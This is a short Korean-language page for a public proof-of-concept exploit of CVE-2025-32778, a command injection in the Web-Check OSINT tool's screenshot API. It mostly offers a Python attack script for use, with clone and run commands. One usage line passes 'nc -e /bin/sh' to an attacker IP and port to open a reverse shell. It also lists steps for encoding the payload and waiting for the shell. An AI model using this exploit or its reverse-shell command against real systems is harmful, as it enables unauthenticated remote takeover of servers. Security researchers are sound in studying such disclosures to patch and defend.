
CVE-2025-32778 PoC 악용: Web-Check OSINT 도구의 명령 주입
CVE-2025-32778은 Lissy93의 Web-Check OSINT 도구에서 발견된 심각한 명령 주입 취약점입니다.
인증되지 않은 공격자가 스크린샷 API의 url 매개변수를 통해 임의의 시스템 명령을 실행할 수 있습니다.
이 Python 스크립트는 익스플로잇을 자동화하며 리버스 셸을 생성하거나 사용자 지정 셸 페이로드를 수용할 수 있습니다.
url 명령 주입 익스플로잇.--lhost와 --lport를 사용한 리버스 셸.--shell을 통한 사용자 지정 셸.--shell과 --lhost/--lport를 함께 사용하는 것을 방지합니다.pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
대상 URL을 scheme://host[:port] 형식으로 정규화합니다.
페이로드를 준비합니다:
--lhost와 --lport를 사용하여 리버스 셸을 생성합니다.--shell을 사용하여 원시 셸 명령을 사용합니다.안전한 URL 주입을 위해 셸 페이로드를 인코딩합니다.
페이로드와 함께 /api/screenshot/에 HTTP GET 요청을 보냅니다.
리버스 셸 연결을 기다립니다.
00xCanelo
GitHub Profile